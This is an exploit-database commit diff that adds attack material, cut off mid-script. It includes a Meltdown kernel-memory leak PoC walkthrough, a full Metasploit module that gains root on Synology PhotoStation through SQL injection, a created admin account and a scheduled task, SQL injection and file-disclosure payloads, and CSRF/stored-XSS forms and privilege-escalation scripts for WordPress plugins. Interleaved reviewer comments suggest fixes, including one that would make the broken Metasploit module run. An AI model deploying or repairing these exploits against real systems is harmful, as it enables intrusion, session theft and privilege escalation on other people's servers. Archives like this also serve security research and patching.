DB: 2018-01-11

28 changes to exploits/shellcodes

Multiple CPUs - Information Leak Using Speculative Execution
Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check

Jungo Windriver 12.5.1 - Privilege Escalation
DiskBoss Enterprise 8.8.16 - Buffer Overflow
HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)
HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)

Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)
WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure
Muviko 1.1 - SQL Injection
WordPress Plugin Events Calendar - 'event_id' SQL Injection
WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery
WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting

BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)
BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)
FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)

BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
Linux/x86 - execve /bin/dash Shellcode (30 bytes)
Alpha - /bin/sh Shellcode (80 bytes)
Alpha - execve() Shellcode (112 bytes)
Alpha - setuid() Shellcode (156 bytes)
BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
Offensive Security 2018-01-11 05:02:24 +00:00
parent ffa8e63e25
commit a7ddd8282b
26 changed files with 2255 additions and 13 deletions


@ -0,0 +1,146 @@
== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and (to some extent) ARM.
I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000 bytes per second from Linux kernel memory after a
~4-second startup, in a 4GiB address space window, with the ability to
read from random offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests) from inside a KVM guest.
The attack doesn't seem to work as well on ARM - perhaps because ARM
CPUs don't perform as much speculative execution because of a
different performance-energy-tradeoff or so?
All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing tresholds.
############################################################
On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3").
So far, we have not managed to leak information this way on AMD or ARM CPUs.
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:
- If the address is not mapped (perhaps also under other
conditions?), instructions that depend on the load are not executed.
- If the address is mapped, but not sufficiently cached, the load loads zeroes.
Instructions that depend on the load are executed.
Perhaps Intel decided that in case of a sufficiently high-latency load,
it makes sense to speculate ahead with a dummy value to get a chance to
prefetch cachelines for dependent loads, or something like that?
- If the address is sufficiently cached, the load loads the data stored at the
given address, without respecting the privilege level.
Instructions that depend on the load are executed.
This is the vulnerable case.
I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:
As root, determine where the core_pattern is in the kernel:
=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====
Then, as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it) from
kernel memory, using the pointer from the previous step:
=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
|/cores/%E.%p.%s.|
ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
|%t.apport %p %s |
ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c
%P...........|
[ zeroes ]
ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
|................|
ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff |
.......u.......|
[ zeroes ]
ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
|e[..............|
ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
|....mA..........|
[ zeroes ]
real 0m13.726s
user 0m9.820s
sys 0m3.908s
=====
As you can see, the core_pattern, part of the previous core_pattern (behind the
first nullbyte) and a few kernel pointers were leaked.
To confirm whether other leaked kernel data was leaked correctly, use gdb as
root to read kernel memory:
=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
=====
Note that the PoC will report uncached bytes as zeroes.
To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.
We have not yet tested whether this still works after a TLB flush.
Regarding possible mitigations:
A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220 (cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER
Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur while for a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out, except for the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.
I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip
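Review bot: the file jumps from the INTRODUCTION straight to the `####` separator and "another variant of this issue ("variant 3")", so the earlier variants that sentence refers back to are not in this file; either include the full report or state at the top that this is an excerpt, and add a link to the original advisory next to the PoC zip so readers can find the omitted sections. Minor: "hardcoded timing tresholds" should read "thresholds".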

365
exploits/php/webapps/43474.rb Executable file

@ -0,0 +1,365 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Synology PhotoStation Multiple Vulnerabilities",
'Description' => %q{
This module exploits multiple vulnerabilities in Synology PhotoStation.
When combined these issues can be leveraged to gain a remote root shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay',
],
'References' =>
[
[ 'URL', 'http://gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2018-01-08',
'DefaultTarget' => 0))
register_options(
[
OptString.new('DSMPORT', [ true, "The default DSM port", '5000']),
])
end
def check
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; SELECT user; -- "
},
})
if res and res.body =~ /PhotoStation/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
rnum = rand(1000)
rstr = Rex::Text.rand_text_alpha(10)
uuid = rnum # User ID
upwd = rstr # User Password
uusr = rstr # User name
vol1 = '/volume1'
audb = '/usr/syno/etc/private/session/current.users'
###########################################################################
# STEP 00: Force PhotoStation to NOT use DSM for the authentication system
###########################################################################
print_status("Switching authentication system to PhotoStation via SQL Injection")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; UPDATE photo_config SET config_value=0 WHERE config_key='account_system'; -- "
},
})
###########################################################################
# STEP 01: Create an admin user
###########################################################################
print_status("Creating admin user: #{uusr} => #{upwd}")
# Password hash
umd5 = Rex::Text.md5(upwd)
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; INSERT INTO photo_user (userid, username, password, admin) VALUES (#{uuid}, '#{uusr}', '#{umd5}', TRUE); -- "
},
})
###########################################################################
# STEP 02: Authenticate and store session identifier
###########################################################################
print_status("Authenticating as admin user: #{uusr}")
res = send_request_cgi(
{
'uri' => '/photo/webapi/auth.php',
'method' => 'POST',
'vars_post' =>
{
'api' =>'SYNO.PhotoStation.Auth',
'method' => 'login',
'version' =>'1',
'username' => uusr,
'password' => upwd,
'enable_syno_token' => 'TRUE',
},
})
if not res or not res.headers or not res.headers['Set-Cookie']
print_error("Unable to retrieve session identifier! Aborting ...")
return
end
uckv = res.headers['Set-Cookie']
psid = /PHPSESSID=([a-z0-9]+);/.match(uckv)[1]
print_status("Got PHP Session ID: #{psid}")
###########################################################################
# STEP 03: Delete any existing path names used from the database
###########################################################################
print_status("Making sure there are no duplicate path index conflicts ...")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; DELETE FROM video WHERE path='#{audb}'; -- "
},
})
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; DELETE FROM video WHERE path='#{vol1}/photo///current.users'; -- "
},
})
###########################################################################
# STEP 04: Create a record for our malicious path in the database
###########################################################################
print_status("Creating video record with bad 'path' data via SQL injection")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; INSERT INTO video (id, path, title, container_type) VALUES (#{rnum}, '#{audb}', '#{rstr}', '#{rstr}'); -- "
},
})
###########################################################################
# STEP 05: Copy session database as root, to the web directory for reading
###########################################################################
print_status("Making a copy of the session db as root via synophotoio")
res = send_request_cgi(
{
'uri' => '/photo/include/photo/album_util.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'copy_items',
'destination' => '2f',
'video_list' => rnum
},
'cookie' => uckv
})
###########################################################################
# STEP 06: Move the session db copy to the web root for retrieval
###########################################################################
print_status("Moving session db to webroot for retrieval")
res = send_request_cgi(
{
'uri' => '/photo/include/file_upload.php',
'method' => 'POST',
'vars_get' =>
{
# /../@appstore/PhotoStation/photo/
'dir' =>'2f2e2e2f4061707073746f72652f50686f746f53746174696f6e2f70686f746f2f',
'name' => "2f",
'fname' => "#{rstr}",
'sid' => "#{psid}",
'action' => 'aviary_add',
},
'vars_post' =>
{
'url' => 'file://' + vol1 + '/photo/current.users'
},
'cookie' => uckv
})
###########################################################################
# STEP 07: Retrieve and read the session db
###########################################################################
print_status("Attempting to read session db")
res = send_request_cgi(
{
'uri' => "/photo/#{rstr}.jpg",
'method' => 'GET'
})
if not res or not res.body
print_error("Unable to retrieve session file! Aborting ...")
return
end
host = /"host": "([^"]+)"/.match(res.body)[1]
sess = /"id": "([^"]+)"/.match(res.body)[1]
syno = /"synotoken": "([^"]+)"/.match(res.body)[1]
print_status("Extracted admin session: #{sess} @ #{host}")
###########################################################################
# STEP 08: Registering files for cleanup
###########################################################################
# Uncomment for cleanup functionality
# register_files_for_cleanup("#{vol1}/photo/current.users")
# register_files_for_cleanup("#{vol1}/@appstore/PhotoStation/photo/#{rstr}.jpg")
###########################################################################
# STEP 09: Create a task containing our payload
###########################################################################
print_status("Creating privileged task to run as root")
# Switch to DSM port from here on out
datastore['RPORT'] = datastore['DSMPORT']
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'name' => '"whatevs"',
'owner' => '"root"',
'enable' => 'true',
'schedule' =>'{"date_type":0,"week_day":"0,1,2,3,4,5,6","hour":0,"minute":0,"repeat_hour":0,"repeat_min":0,"last_work_hour":0,"repeat_min_store_config":[1,5,10,15,20,30],"repeat_hour_store_config":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]}',
'extra' => '{"notify_enable":false,"script":"' + payload.encoded.gsub(/"/,'\"') + '","notify_mail":"","notify_if_error":false}',
'type' => '"script"',
'api' => 'SYNO.Core.TaskScheduler',
'method' => 'create',
'version' => '2',
},
'cookie' => "id=#{sess}"
})
if not res or not res.body
print_error("Unable to create task! Aborting ...")
return
end
task = /{"id"\d+)},"success":true}/.match(res.body)[1]
print_status("Task created successfully: ID => #{task}")
###########################################################################
# STEP 10: Execute the selected payload
###########################################################################
print_status("Running selected task as root. Get ready for shell!")
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'stop_when_error' => 'false',
'mode' => '"sequential"',
'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"run","version":1,"task":[' + task + ']}]',
'api' => 'SYNO.Entry.Request',
'method' => 'request',
'version' => '1'
},
'cookie' => "id=#{sess}"
})
###########################################################################
# STEP 11: Delete payload task from scheduler
###########################################################################
print_status("Deleting malicious task from task scheduler")
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'stop_when_error' => 'false',
'mode' => '"sequential"',
'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"delete","version":1,"task":[' + task + ']}]',
'api' => 'SYNO.Entry.Request',
'method' => 'request',
'version' => '1'
},
'cookie' => "id=#{sess}"
})
end
end
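Review bot: the task-id regex `task = /{"id"\d+)},"success":true}/.match(res.body)[1]` is missing the opening parenthesis (and colon) of its capture group, so it contains an unmatched `)` and Ruby will refuse to parse the module; the intended pattern looks like `/{"id":(\d+)},"success":true}/`. The same line and the `host`/`sess`/`syno` extractions call `.match(...)[1]` directly, which raises NoMethodError on nil instead of a clean `print_error` when the response does not match, so guard them like the earlier `Set-Cookie` check. Also worth stating in the module description: STEP 00 flips `account_system` in `photo_config`, STEP 01 inserts an admin row into `photo_user`, and the copied session file is written under the web root, none of which is reverted since the cleanup registrations are commented out, so the module leaves durable artifacts on the target.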


@ -0,0 +1,23 @@
# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10
1. description :
unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
3. timeline
- jan 1, 2018 report vendor
- jan 1, 2018 vendor send email
- jan 1, 2018 send poc
- jan 2, 2018 vendor contact team
- jan 8, 2018 vendor send email about fixed issue
4. solution :
update to version 3.2
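Review bot: the title misspells "WordPress" as "Worpress"; fix it so the entry matches the rest of the database. The description should also say whether the `file=` parameter is resolved relative to the web root or as an absolute path: the PoC passes `/index.php` while the text claims `wp-config` can be read, and the header has no Version line even though the solution says the fix is in 3.2, so add the tested vulnerable version.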


@ -0,0 +1,148 @@
# Exploit Title: Muviko 1.1 - Multiple SQL Injection
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Date: 09/01/2018
# CVE: CVE-2017-17970
# Vendor Homepage: https://www.muvikoscript.com
# Version: 1.1
# Tested on: Mac OS
--------------------------------------------------------------------------------------------------------
# SQL Injection: login.php form parameter [POST] email
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
--------------------------------------------------------------------------------------------------------
# SQL Injection: load_season.php form parameter [GET] season_id
GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection get_raring.php parameter [GET] movie_id
GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection update_rating.php parameters [GET] rating,movie_id
GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection set_player_source.php parameters [GET] id
GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
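Review bot: the third heading says `get_raring.php` but the request below it targets `get_rating.php`; fix the heading. The `login.php` capture has `Content-Length: 45` while its body line is about 80 bytes, so the request was edited after capture and the header should be corrected or dropped. The last two entries only give `[SQL]` placeholders for `movie_id`, `rating` and `id`, so state how those parameters were verified as injectable, otherwise they read as unconfirmed.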


@ -0,0 +1,53 @@
# Exploit Title: Wichipi Events Calendar - SQL Injection
# Date: 09-01-2018
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: codecanyon.net/user/wachipi
# Version: 1.0
# CVE-ID: CVE-2018-5315
Events Calendar allows you to easily add to your website a powerful
interactive calendar to present your events.
Found 09-01-18
Vendor reply & fix 09-01-2018
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
via the event_id parameter to event.php.
NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
[Additional Information]
http://
{TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
[Vulnerability Type]
SQL Injection
[Vendor of Product]
https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
[Affected Product Code Base]
Events Calendar - 1.0
[Affected Component]
events.php
[Attack Type]
Remote
[Impact Code execution]
true
[Impact Escalation of Privileges]
true
[Impact Information Disclosure]
true
[Attack Vectors]
To exploit, union select 29 columns. User can use 2 or 25 for information
gathering.
[Discoverer]
Dennis Veninga @ Networking4all.com
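Review bot: the affected component is inconsistent: the description and the PoC URL say `event.php` while [Affected Component] says `events.php`; pick the right one. The PoC URL is also broken across two lines after `http://`, the title says "Wichipi" while the vendor link and the description say "Wachipi", and [Impact Code execution] and [Impact Escalation of Privileges] are set to true although the write-up only demonstrates information disclosure (`@@version`), so either justify those or set them to false.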


@ -0,0 +1,74 @@
* Exploit Title: Social Media Widget by Acurax [CSRF]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://www.acurax.com/
* Software Link: https://wordpress.org/plugins/acurax-social-media-widget
* Version: 3.2.5
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `acx_asmw_saveorder` which calls back the
function `acx_asmw_saveorder_callback`. The later does not implement any
anti-CSRF controls thus allowing a malicious actor to perform an attack
that could update plugin specific option `social_widget_icon_array_order`.
Vulnerable param is `$_POST['recordsArray']` and it is saved as an
option with the name `social_widget_icon_array_order`.
Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will
be served when a user with the right privileges visits plugin's settings
page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
Vulnerable code is located in file
`acurax-social-media-widget/function.php` line 993:
```
function acx_asmw_saveorder_callback() {
    global $wpdb;
    $social_widget_icon_array_order = $_POST['recordsArray'];
    if ( current_user_can( 'manage_options' ) ) {
        $social_widget_icon_array_order = serialize(
$social_widget_icon_array_order );
        update_option( 'social_widget_icon_array_order',
$social_widget_icon_array_order );
        echo "<div id='acurax_notice' align='center' style='width:
420px; font-family: arial; font-weight: normal; font-size: 22px;'>";
        echo "Social Media Icon's Order Saved";
        echo "</div><br>";
    }
    die(); // this is required to return a proper result
}
add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
```
PoC
---
In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent
XSS attack. The payload is available in plugin's settings.
```
<pre class="lang:html decode:true "><form method="post" action="http://vuln.test/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="acx_asmw_saveorder">
    <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>">
    <button type="submit" value="Submit">Submit</button>
</form>
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-12**: Tried to contact plugin's vendor through the contact
form on their website
3. **2017-12-12**: Vendor replied
4. **2017-12-12**: Vendor Received Details
5. **2018-01-02**: Patch released
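Review bot: the `<pre class="lang:html decode:true ">` at the start of the PoC block is copy residue from a blog post, not part of the form; remove it so the PoC is plain HTML. The Persistent XSS claim also depends on the saved `social_widget_icon_array_order` option being echoed unescaped on the settings page, but the quoted code only shows the save path, so quote or reference the output sink as well. Minor: "The later" should be "The latter", "vulnerabilityt o" should be "vulnerability to", and a Solution line naming the fixed version (the timeline says a patch was released 2018-01-02) would match the other advisories in this commit.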


@ -0,0 +1,109 @@
* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/cms-tree-page-view
* Version: 1.4
* Tested on: WordPress 4.8.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `cms_tpv_add_page` which calls back the
function `cms_tpv_add_page`. The later does not implement any anti-CSRF
controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```
<pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="cms_tpv_add_page">
    <input type="text" name="type" value="after">
    <input type="text" name="pageID" value="1">
    <input type="text" name="post_type" value="page">
    <input type="text" name="page_title" value="<script>alert(2)</script>">
    <button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The post\_type is user defined so in the same manner we could
create any post type.
```
#!/usr/bin/env php
<?php
/*******************************************************************************
 * CMS Tree Page View [Privilege Escalation]
 *
 * To install deps run `composer require wordfence/exkit`.
 *
 * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
 * @date 2017-08-09
 ******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
Cli::writeInfo( 'Sending payload...' );
$postData = [
    'action'      => 'cms_tpv_add_page',
    'type'        => 'after',
    'pageID'      => '1',
    'post_type'   => 'page',
    'page_title' => date('Y-m-d H:i:s'),
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || $r->body == '0'){
    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-23**: Vendor notified by email
3. **2018-01-06**: Patch released
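Review bot: the PoC text says the `$_POST["page_titles"]` param is exploited, but both the HTML form and the PHP script send `page_title` (singular); align the description with the code. Also drop the `<pre class="lang:html decode:true ">` copy residue in front of the form, the script header's `@date 2017-08-09` predates the stated 2017-12-12 discovery date, "The later" should be "The latter", and a Solution line naming the fixed version (the timeline says a patch was released 2018-01-06) would match the other entries.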


@ -0,0 +1,117 @@
* Exploit Title: Admin Menu Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view
* Version: 2.6.9
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `admin_menu_tree_page_view_add_page` which
calls back the function `admin_menu_tree_page_view_add_page`. The later
does not implement any anti-CSRF controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```
<pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="admin_menu_tree_page_view_add_page">
    <input type="text" name="type" value="after">
    <input type="text" name="pageID" value="1">
    <input type="text" name="post_type" value="page">
    <input type="text" name="page_titles[]" value="<script>alert(1)</script>">
    <input type="text" name="post_status" value="publish">
    <button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The post\_type is user defined so in the same manner we could
create any post type.
```
#!/usr/bin/env php
<?php
/*******************************************************************************
 * Admin Menu Tree Page View [Privilege Escalation]
 *
 * To install deps run `composer require wordfence/exkit`.
 *
 * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
 * @date 2017-08-09
 ******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
$s->XDebugOn();
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
